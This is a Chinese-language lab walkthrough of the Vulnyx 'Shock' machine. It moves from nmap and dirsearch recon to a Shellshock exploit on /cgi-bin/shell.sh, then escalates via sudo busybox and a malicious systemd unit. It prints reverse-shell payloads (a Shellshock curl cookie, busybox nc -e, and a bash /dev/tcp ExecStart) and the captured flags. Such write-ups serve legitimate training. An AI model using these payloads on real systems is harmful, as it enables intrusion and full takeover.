Shock

靶机说明

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-07 09:27 CST
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:69:9E:18 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.36
Host is up (0.0019s latency).
MAC Address: 08:00:27:01:CD:F0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

靶机IP:192.168.2.36

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.36                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-07 09:28 CST
Nmap scan report for 192.168.2.36
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:01:CD:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.21 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p21,22,80 192.168.2.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-07 09:28 CST
Nmap scan report for 192.168.2.36
Host is up (0.00098s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
22/tcp open   ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:01:CD:F0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.36                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-07 09:29 CST
Nmap scan report for 192.168.2.36
Host is up (0.00087s latency).
All 100 scanned ports on 192.168.2.36 are in ignored states.
Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
MAC Address: 08:00:27:01:CD:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 51.62 seconds

二、WEB渗透

1、网站

访问80端口

2、目录扫描

1
2
3
4
5
┌──(root㉿kali)-[/miaosec]
└─# dirsearch -u "http://192.168.2.36"     
....
[09:35:51] 403 -  277B  - /cgi-bin/
....

找到一个/cgi-bin

再次进行目录扫描

1
2
3
4
5
┌──(root㉿kali)-[/miaosec]
└─# dirsearch -u "http://192.168.2.36/cgi-bin/"

[09:54:07] Starting: cgi-bin/
[09:55:29] 500 -  610B  - /cgi-bin/shell.sh

找到路径/cgi-bin/shell.sh

3、CGI-bin

💡Tip

1
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/cgi.html#shellshock

CGI脚本是 Perl 脚本,因此,如果您攻破了一台可以执行.cgi脚本的服务器,您可以上传一个 Perl 反向 shell(/usr/share/webshells/perl/perl-reverse-shell.pl),将扩展名从.pl更改为.cgi,赋予执行权限(chmod +x),然后通过 Web 浏览器访问该反向 shell并执行脚本。

使用NAMP测试,是否存在漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap 192.168.2.36 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/shell.sh
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-07 10:06 CST
Nmap scan report for 192.168.2.36
Host is up (0.00062s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_      http://seclists.org/oss-sec/2014/q3/685
MAC Address: 08:00:27:01:CD:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

三、获取www-data权限

使用命令反弹shell

1
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/192.168.2.4/4444 0>&1' http://192.168.2.36/cgi-bin/shell.sh

获取到www-data权限

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/miaosec]
└─# nc -lvnp 4444                         
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.36] 60550
bash: cannot set terminal process group (492): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ id 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取will权限

查看sudo -l

1
2
3
4
5
6
7
8
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on shock:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on shock:
    (will) NOPASSWD: /usr/bin/busybox

www-data用户可以使用 will 用户身份来执行 busybox

直接使用下面方式提权即可

1
sudo -u will busybox sh

反弹shell

1
bash-4.3$ sudo -u will /usr/bin/busybox nc 192.168.2.4 4444 -e /bin/bash

获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.36] 60558
id
uid=1001(will) gid=1001(will) groups=1001(will)

稳定shell

1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

2、获取root权限

查看sudo -l

1
2
3
4
5
6
7
will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User will may run the following commands on shock:
    (root) NOPASSWD: /usr/bin/systemctl

will用户可以使用root权限来执行/usr/bin/systemctl

直接使用下面方式提权即可

1
2
sudo systemctl
!sh

systemctl提权

利用方式:

  1. 创建一个恶意服务单元文件(需有写权限的目录,如 /tmp):
    部分 Linux 发行版(如 Ubuntu 22.04+、RHEL 8+)出于安全考虑,禁止从 /tmp/dev/shm 等临时目录加载 systemd 单元。因此在/home/will目录创建pwn.service

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    cat > pwn.service << 'EOF'
    [Unit]
    Description=Pwn Service

    [Service]
    Type=oneshot
    ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'
    RemainAfterExit=yes

    [Install]
    WantedBy=multi-user.target
    EOF

  2. 通过 systemctl 加载该服务

    1
    2
    sudo systemctl link /home/will/pwn.service 
    #systemctl link必须使用绝对路径,不能只写文件名。

  3. 启动该服务

    1
    sudo systemctl start pwn.service

获取到shell

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.36] 60560
bash: cannot set terminal process group (1139): Inappropriate ioctl for device
bash: no job control in this shell
root@shock:/# id
id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

1
2
3
root@shock:/# cat /root/root.txt /home/will/user.txt
f47fa61f24939dfcc393936fe15382d4
0afcf82e564efd49b65e8071b1d8b11c
Vulnyx
#CGI #sudo-busybox #sudo-systemctl
Shock
http://miao-sec.github.io/Vulnyx/Shock/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO